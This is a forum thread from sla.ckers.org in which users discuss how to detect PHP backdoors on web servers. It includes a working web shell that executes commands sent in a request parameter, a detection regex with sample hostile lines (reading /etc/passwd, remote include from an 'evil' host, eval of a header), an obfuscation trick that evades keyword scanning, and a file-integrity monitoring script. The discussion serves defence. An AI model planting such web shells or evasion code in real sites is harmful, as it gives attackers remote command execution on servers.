Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Any project to detect php backdoor?
Posted by: hookits
Date: September 08, 2009 04:50AM

Hey, guys!

I want to create a project to detect the php backdoor, and I found a very easy example of php backdoor is(by http://michaeldaw.org):
<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>

Usage: hxxp://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

So we should write a python/perl script to scan every file in the directory and find if there is a "system" in it?

Besides "system", I think there should be some more command we should concentrate on, for example "exec".

However, I don't have a full list of the dangerous command, waiting for your advice:p



Edited 1 time(s). Last edit at 09/08/2009 04:51AM by hookits.

Options: ReplyQuote
Re: Any project to detect php backdoor?
Posted by: barbarianbob
Date: September 08, 2009 08:27AM

/exec|system|eval|`|dl|passthru|{\s*\$\s*{.*}\s*}|include|require/i

is what I would start off with.
But you may want to omit include/require.

examples:
eval($_SERVER['HTTP_EVIL']);
`cat /etc/passwd`;
$a='php'.'info';$z="{${$a()}}";
include 'http://evil/...';

Options: ReplyQuote
Re: Any project to detect php backdoor?
Posted by: rsnake
Date: September 11, 2009 11:47AM

Code obfuscation is the very next thing they'll do if they know this is how they're being detected. But it'll probably work well for a while.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Any project to detect php backdoor?
Posted by: rvdh
Date: September 12, 2009 08:57AM

chroot jail + php safe_mode on older versions of PHP. But php safe_mode can be bypassed in some situations, don't rely on it ALONE. Further, disable PHP modules you never use, like fopen for example. Pretty much depends on what you allow or disallow.

To find it, just use your terminal find commands. Or try a program that shows the file diffs e.g. changes made to the file system after a certain point. (like aide IDS does).

Options: ReplyQuote
Re: Any project to detect php backdoor?
Posted by: rvdh
Date: September 12, 2009 09:15AM

Or try mine, maybe you can use it for some inspiration. It generates hashes from files and compares them run through a crontab. Pretty basic, but you get the idea.



<?php

/*

ZEROSUM - Automated File Integrity Bot.

Copyright (C) 2008 rvdh.ath.cx

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY;
without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/


TABLE STRUCTURE

CREATE TABLE `zerosum` (
	`id` int(11) NOT NULL auto_increment,
	`filename` varchar(255) NOT NULL default '',
	`permhash` varchar(40) NOT NULL default '',
	`filehash` varchar(40) NOT NULL default '',
	PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


CRONTAB


lynx -dump "http://www.example.com/zerosum.php" >/dev/null 2>&1

or

/usr/bin/php -q /home/public_html/zerosum.php


*/


# Store this below the /www/ folder!


$dbHost = "localhost";
$dbBase = "";
$dbUser = "";
$dbPass = "";


$dbLink = mysql_connect($dbHost, $dbUser, $dbPass) or die();
mysql_select_db($dbBase) or die();


function zerosum($dir){
    # Settings
    $update_files = false;

    # update files after check, program does this already.
    $index_files = false;

    # indexing files
    $mailbatch  = true;

    # send an alert mail
    $showbatch = false;

    # show batch onscreen
    $domain = 'example.com';

    $mailto  = 'YOU@example.com';

    $subject = 'Zerosums!';

    $hashses = array();

    $directory = dir($dir);

    while ($file = $directory->read()){
        if ($file != '.' && $file != '..') {
            $modified = date ("F d Y H:i:s", filemtime($dir.'/'.$file));
            $permission = substr(sprintf('%o', fileperms($dir.'/'.$file)), -4);
            $hashsum = filesize($dir.'/'.$file);
            array_push($hashses,htmlspecialchars($dir.'/'.$file,ENT_QUOTES,'UTF-8').'|'.$modified.'|'.$hashsum.'|'.$permission);
        }
    }
    $directory->
    close();
    if($showbatch) {
        echo '<p>Batchdate: '.date ("F d Y H:i:s").'</p>';
        $count = 0;
        foreach($hashses as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("select * from zerosum where filename = '".$tmp[0]."'");
            if(mysql_num_rows($sql) >
            0) {
                while($row = mysql_fetch_array($sql)) {
                    if($row['filehash'] != sha1($tmp[2])) {
                        echo $row['filename'] . ' was altered on: ' . $tmp[1] . ' current permission: ' . $tmp[3] . ' size: ' . $hashsum . '<br>';
                        $count++;
                    }
                    if($row['permhash'] != sha1($tmp[3])) {
                        echo $row['filename'] . '\'s permission was altered to: ' . $tmp[3] . '<br>';
                        $count++;
                    }
                }
            }
            else {
                echo $tmp[0] . ' was deleted, or does not exist! <br>';
            }
            if($count >
            0) {
                # index all files again.
                $update_files = true;
            }
        }
    }
    if($mailbatch) {
        if($mailto) {
            $message1 = 'Batchdate: '.date ("F d Y H:i:s").', ';
            $count1 = 0;
            foreach($hashses as $hash) {
                $tmp1 = explode('|',$hash);
                $sql1 = mysql_query("select * from zerosum where filename = '".$tmp1[0]."'");
                if(mysql_num_rows($sql1) >
                0) {
                    while($row1 = mysql_fetch_array($sql1)) {
                        if($row1['filehash'] != sha1($tmp1[2])) {
                            $message1 .= $row1['filename'] . ' was altered on: ' . $tmp1[1] . ' current permission: ' . $tmp1[3] . ' size: ' . $hashsum . ', ';
                            $count1++;
                        }
                        if($row1['permhash'] != sha1($tmp1[3])) {
                            $message1 .= $row1['filename'] . '\'s permission was altered to: ' . $tmp1[3] . ', ';
                            $count1++;
                        }
                    }
                }
                else {
                    echo $tmp1[0] . ' was deleted, or does not exist! <br>';
                }
            }
            if($count1 >
            0) {
                # mail batch
                mail($mailto,$subject,$message1,"from:zerosum@".$domain);
                # index all files again.
                $update_files = true;
            }
        }
        else {
            echo 'Cannot email batch, e-mail is empty!';
            exit;
        }
    }
    if($update_files) {
        foreach($hashses as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("update zerosum set filehash = '".sha1($tmp[2])."', permhash = '".sha1($tmp[3])."' where filename = '".$tmp[0]."'") or die();
        }
    }
    if($index_files) {
        # You must run this first, to Index all the files in the DIR!
        $empty = mysql_query("TRUNCATE TABLE `zerosum`") or die();
        foreach($hashses as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("insert into zerosum set filename = '".$tmp[0]."', filehash = '".sha1($tmp[2])."', permhash = '".sha1($tmp[3])."'") or die();
        }
    }
    echo 'OK';
}


# Example call:

zerosum('tutorialstuff');


?>



Edited 1 time(s). Last edit at 09/12/2009 09:30AM by rvdh.

Options: ReplyQuote
Re: Any project to detect php backdoor?
Posted by: rvdh
Date: September 12, 2009 09:46AM

Or, if you want to scan the source, here is a symbol list I composed. Note, this took a very long time to gather. I currently use this in a FireFox extension to scan source code.

http://rvdh.ath.cx/projects/symbols.txt

Options: ReplyQuote
Re: Any project to detect php backdoor?
Posted by: Menztrual
Date: June 29, 2010 02:26AM

Doesn't stop someone doing something like
<?php
$a ="sy";
$b = "ste";
$c = "m";

$func = $a.$b.$c;

$func("ls");

?>

Options: ReplyQuote


Sorry, only registered users may post in this forum.